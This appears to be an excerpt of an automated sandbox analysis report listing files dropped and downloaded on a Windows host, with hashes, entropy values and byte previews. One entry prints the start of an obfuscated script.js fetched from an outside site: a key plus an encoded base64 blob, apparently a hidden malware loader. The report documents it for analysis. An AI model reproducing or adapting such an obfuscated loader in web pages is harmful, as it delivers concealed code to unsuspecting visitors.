                                                        Preview:SessionID=f94b4975-4a97-4932-af23-3dc13a5934e0.1732886988936 Timestamp=2024-11-29T08:29:48:936-0500 ThreadID=6672 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=f94b4975-4a97-4932-af23-3dc13a5934e0.1732886988936 Timestamp=2024-11-29T08:29:48:938-0500 ThreadID=6672 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=f94b4975-4a97-4932-af23-3dc13a5934e0.1732886988936 Timestamp=2024-11-29T08:29:48:938-0500 ThreadID=6672 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=f94b4975-4a97-4932-af23-3dc13a5934e0.1732886988936 Timestamp=2024-11-29T08:29:48:938-0500 ThreadID=6672 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=f94b4975-4a97-4932-af23-3dc13a5934e0.1732886988936 Timestamp=2024-11-29T08:29:48:938-0500 ThreadID=6672 Component=ngl-lib_NglAppLib Description="SetConf
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):29752
                                                        Entropy (8bit):5.425507046292411
                                                        Encrypted:false
                                                        SSDEEP:192:0cbgIhPcbocbAIlncb2cbwI/RcbNcbQIVvcbPEAcbAIT5cbF:fhWlA/TVoErTa
                                                        MD5:6F3FD4DB2E97B42AE6CC0EF9C1755A03
                                                        SHA1:012D107905FF22EB68D9AA4EC019242FE79B9DC0
                                                        SHA-256:1BD9549566FF40A93BE364C5BD26AA4C1B5186E632C95F6ED3888F94F52AB9BB
                                                        SHA-512:507A7CA5CC5797D3FCA29EBEECF686B4E270B3B6099D13DC4882AC6BF28EDA97F1BA1D1718B37DCA7CFDFE5EB56E33A4A772FD4361EEF8894E8C98C0841C9D8F
                                                        Malicious:false
                                                        Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                        Category:dropped
                                                        Size (bytes):1419751
                                                        Entropy (8bit):7.976496077007677
                                                        Encrypted:false
                                                        SSDEEP:24576:/gWL07oXGZ6ZwYIGNPJwdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:4WLxXGZ6ZwZGM3mlind9i4ufFXpAXkru
                                                        MD5:B8A9C4994406DB4C1F6B58698B9AA2BA
                                                        SHA1:FC6963A1AC3D5236A6A330CE025502FFE9DFC3A7
                                                        SHA-256:BB4ED912472A007034FA79E1E659367E3C9F8129464E18B3086283B857D9605E
                                                        SHA-512:A6A92D62951EBF13F074B0ED087824DF8246FE24425546E46DB48BA9005EDF3CD9AC3E5A7F88493F3C5DD2A02F96B1801317CA519C4E87444D3BB9B51DBE397F
                                                        Malicious:false
                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                        Category:dropped
                                                        Size (bytes):758601
                                                        Entropy (8bit):7.98639316555857
                                                        Encrypted:false
                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                        MD5:3A49135134665364308390AC398006F1
                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                        Malicious:false
                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                        Category:dropped
                                                        Size (bytes):1407294
                                                        Entropy (8bit):7.97605879016224
                                                        Encrypted:false
                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                                        MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                        SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                        SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                        SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                        Malicious:false
                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                        Category:dropped
                                                        Size (bytes):386528
                                                        Entropy (8bit):7.9736851559892425
                                                        Encrypted:false
                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                        Malicious:false
                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 29 12:29:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2673
                                                        Entropy (8bit):3.986049390431138
                                                        Encrypted:false
                                                        SSDEEP:48:8FdqTWGqHyidAKZdA1FehwiZUklqehVy+3:8SLb2y
                                                        MD5:AE8216A26390843407D5FBF696981B8B
                                                        SHA1:7F91DB280CC17EF3D208A4714E4C196AD6E42C9D
                                                        SHA-256:44659AA64DCA16A759EFA311BA24F2C9EE6D0C3ADB45F79EE7888459F60AD12A
                                                        SHA-512:6F232A343E7123FDBC2DC4CE7C0FDDEF289BBF9B3DEF580E251E48216DCA952FBBC327B0EC43F6D5E3EFBBD464E59E484397A5EB3DBA2A0AB8AAB004305ABC6E
                                                        Malicious:false
                                                        Preview:L..................F.@.. ...$+.,.....jl.bB..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I}Y.k....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Y.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Y.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Y.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V}Y.k...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............pN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 29 12:29:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2675
                                                        Entropy (8bit):4.005277213949619
                                                        Encrypted:false
                                                        SSDEEP:48:8rdqTWGqHyidAKZdA1seh/iZUkAQkqehmy+2:8kLF9Qry
                                                        MD5:984EBB8970403DED795657C0765AAACF
                                                        SHA1:AB48AB036EA43E8ABDBAA70B9352F3CFFFEE332E
                                                        SHA-256:6439E28808859C442B49BBD03D53BCF0FD4B33C65B8AA2406E8C8A692C6AC5C9
                                                        SHA-512:C00A555927FB15627335B2B17C5A4BDB487BB3ADF7D25E1ABDD0F91235C4308F0DC705B23B2062AF1E930A531A9940885050C6B2F9AD05AABB5B3B8611C52FB3
                                                        Malicious:false
                                                        Preview:L..................F.@.. ...$+.,......`.bB..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I}Y.k....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Y.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Y.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Y.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V}Y.k...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............pN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2689
                                                        Entropy (8bit):4.011196088743126
                                                        Encrypted:false
                                                        SSDEEP:48:8XdqTWGAHyidAKZdA14meh7sFiZUkmgqeh7sMy+BX:8oL3nyy
                                                        MD5:53CEC59587F4DB05F2A00F390544821E
                                                        SHA1:CB10F2678BC30225C4E29DE365E488F1E1EB6F27
                                                        SHA-256:3439BEB4385283B3AA69357FF93A02B3FD885A5AAD926B029A51124A8B7AA03B
                                                        SHA-512:E333236C52BBB0D142C40E6DDD0550574B951AE2C59F0C746E08C5B262085B654EA024B276D55DB60878C47F0B1FB72DF388838663679ABF7CB72A5A0578441F
                                                        Malicious:false
                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I}Y.k....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Y.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Y.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Y.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............pN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 29 12:29:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2677
                                                        Entropy (8bit):4.001865959186792
                                                        Encrypted:false
                                                        SSDEEP:48:8SdqTWGqHyidAKZdA1TehDiZUkwqeh6y+R:8PLWUy
                                                        MD5:244BA113BD22E0B6293C4D6F2B0FF6BE
                                                        SHA1:8CAF3534B2A102AFFFBFE8FC6AC869F60DCC8E73
                                                        SHA-256:654EBBD983B172FCAE0529D0444047276CD000DD526D9B8299423800738778C5
                                                        SHA-512:FB99E1B0AC9A04B409807AE1AE2F876A641A918603D6E136B7BCFF0E88166F70C3F056DD0F496B49A8A4A42B56AE63B8C51E4FD041D9CC9EA1F8FCD953C96DB8
                                                        Malicious:false
                                                        Preview:L..................F.@.. ...$+.,......Z.bB..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I}Y.k....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Y.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Y.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Y.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V}Y.k...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............pN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 29 12:29:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2677
                                                        Entropy (8bit):3.9895626783849405
                                                        Encrypted:false
                                                        SSDEEP:48:8mdqTWGqHyidAKZdA1dehBiZUk1W1qeh4y+C:8rLW9Yy
                                                        MD5:A446F031145243C9901B0D2D4C38F1AF
                                                        SHA1:C77AF282591152DC39CEB33D29878173B98CB2E6
                                                        SHA-256:1FCFCE73F867A727C201C1B207AD743A285BA2BD0294EFFE7F8A2CA4E34EB4B0
                                                        SHA-512:DB7D925F66EEDDC9B89C8ED4DDFD4E9DA71991D75B4E3DB6160E151F90BC9B88DA988EA2BDB7947C983EA3F10930092FC776C3186E832D5D05340C516C49DFEC
                                                        Malicious:false
                                                        Preview:L..................F.@.. ...$+.,......f.bB..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I}Y.k....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Y.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Y.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Y.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V}Y.k...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............pN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 29 12:29:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                        Category:dropped
                                                        Size (bytes):2679
                                                        Entropy (8bit):4.000888354410224
                                                        Encrypted:false
                                                        SSDEEP:48:8gPdqTWGqHyidAKZdA1duTeehOuTbbiZUk5OjqehOuTbyy+yT+:89LsTfTbxWOvTbyy7T
                                                        MD5:79AF6A8FD0FE2B3AC9DDC1EF73E02005
                                                        SHA1:951E075E6E2D6DA411A28A030D787CBBD71A4CB3
                                                        SHA-256:31EFBC0FFC0307F5903569114AA352CF8BC79205CFA1D99DC3B92657FFD14834
                                                        SHA-512:B3717106926370718E6BA55D7DDA82D52715D504EDFBBDD1EBECC384EB5143B523CD57FB80324F59E21CFA0C424AEB9DEADA28F523F624076651E62420672ED9
                                                        Malicious:false
                                                        Preview:L..................F.@.. ...$+.,.....hQ.bB..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I}Y.k....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Y.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Y.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Y.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V}Y.k...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............pN......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):16
                                                        Entropy (8bit):3.75
                                                        Encrypted:false
                                                        SSDEEP:3:HxMCR:iY
                                                        MD5:33EF2868BE6AA314700E14BD49C768F7
                                                        SHA1:31F61F2918D49D189AD92FB84D8C82B96C075FBE
                                                        SHA-256:A06CB250708EDB37CB17B7ED1019F55808FE237E5B1700722EDF0F451B9ABF92
                                                        SHA-512:1EB3341CE08D51A32F86C61709C6BCFA847761603E5F90584171A29CEDBC78308B9CDCEA9F636107749E76192E5208F17E36A6B59AC6EE0551535A9E8E57959A
                                                        Malicious:false
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnNhspww4z4xBIFDUMF7i4=?alt=proto
                                                        Preview:CgkKBw1DBe4uGgA=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (8794)
                                                        Category:downloaded
                                                        Size (bytes):8831
                                                        Entropy (8bit):5.2261593995743105
                                                        Encrypted:false
                                                        SSDEEP:192:VpqgJqqWFV1NAAacnKflfbMXv7RcJncmoMO8ejok:Vp3JoF+eKpMXdincmovjr
                                                        MD5:4C1820154EC47B89CA1BB86380227ADF
                                                        SHA1:54EDB576DB3B6FBEB0DD9E06876F842B46E3F0D9
                                                        SHA-256:C603134B41351BA0664DF64D8CBC553080C23E608E84DA12F9250EC53E4B8352
                                                        SHA-512:DB5748AC920DA1B0321AC6B3B91549B00C65316EF960678A28FB56CD40E21C8171E49AE8CEA8A490456297169272A697B49C319CF64DE2613CB9AF6910E1DAD2
                                                        Malicious:false
                                                        URL:https://apnasofa.com/episode/script.js
                                                        Preview:var key = "secretkey";.var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US0pWUyIGBkURBgQQH0UFAAoZSzArP0ULExYcYUVZFRANEREdBAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0VZUxhpUkUJYW9ZU0pMUicVGABPR0UGHAYbDwBZFRANEREdBAtzU0UFBwsXHwwWHUUBExYRXVE8HQYMFgBcGBELWkUYeEVUS0VZUxERC0UPYUVZU0VDUkVUS0ULFhEWAAtUCREWEk0QBhddUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZABERSW9US0VZU0UeeEVUFm9zU0VMXUU9BQwNGgQPGx8RSwILEgdDFwgVAglzU0UCBxEbDBcYEQcGFiAZCgwVU1hDFQAALggYGgklAAoZPjc1W0xYeEVUYUVZXEpDPgoXChEQHAtDNgAADgYNGgoNeEVUChYAHQZDFBAaCBEQHAtDFQAAJwoaEhEKHQs9BQMWW0xDCW9US0VZU0UXABxUEG9ZU0VDUkVUS0VZXEpDIhcdBgQLCkUPHQYVHw
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 1871 x 308, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):21327
                                                        Entropy (8bit):7.8373557915707295
                                                        Encrypted:false
